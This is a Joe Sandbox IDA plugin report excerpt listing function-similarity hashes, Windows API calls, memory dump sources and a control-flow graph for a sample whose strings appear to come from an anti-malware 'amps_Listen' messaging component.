                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                    • String ID:
                                                    • API String ID: 1445889803-0
                                                    • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                    • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                    • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                    • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                    • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1617791916-0
                                                    • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                    • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                    • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                    • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContext
                                                    • String ID:
                                                    • API String ID: 2202868296-0
                                                    • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                    • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                    • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                    • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise_clrfp
                                                    • String ID:
                                                    • API String ID: 15204871-0
                                                    • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                    • Instruction ID: 3e3297c6eb00ceb51c835567ac0d322997380907dbf9e9789061d28487de4ffb
                                                    • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                    • Instruction Fuzzy Hash: D9B11573604B898BEB19CF6DC89636C3BA0FB84B88F158926DB5D937A4CB39D451C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 203985260-0
                                                    • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                    • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                    • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                    • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                    • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                    • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                    • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                    • Instruction ID: c8335e6e1eec12cc8b935499e5516c712a603316cce9c81c864e67c9a492d449
                                                    • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                    • Instruction Fuzzy Hash: 6351EA22B0878146FB249BB9A8451AEBBA5FB447D8F145134EF5DABB95DF3CD401C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: EntryFunctionLookup
                                                    • String ID:
                                                    • API String ID: 3852435196-0
                                                    • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                    • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                    • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                    • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                    • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                    • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                    • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                    • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                    • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                    • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                    • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                    • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                    • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                    • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                    • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                    • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                    • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                    • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                    • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                    • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                    • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                    • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                    • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                    • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                    • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -
                                                    • API String ID: 0-2547889144
                                                    • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                    • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                    • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                    • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                    • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                    • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                    • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                    • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                    • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                    • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                    • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                    • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                    • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                    • Instruction ID: c4227e967a0fee9945e92eb15641f255aff1a61f00efb9581255488329e3aa96
                                                    • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                    • Instruction Fuzzy Hash: 5AF06271B192958BEBA88F6CA842B2977D0EB483C4F948139D78D83B14D63CD0608F04

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 360 140003a6c-140003a8e LeaveCriticalSection 358->360 361 140003a36 359->361 362 140003a3e-140003a49 359->362 363 140003ab4-140003abe 360->363 364 140003a90-140003aad #4 360->364 361->362 362->360 365 140003a4b-140003a65 SetEvent ResetEvent 362->365 366 140003ae8-140003af9 363->366 367 140003ac0-140003ae1 #4 363->367 364->363 365->360 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                    • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                    • API String ID: 1021822269-3147033232
                                                    • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                    • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
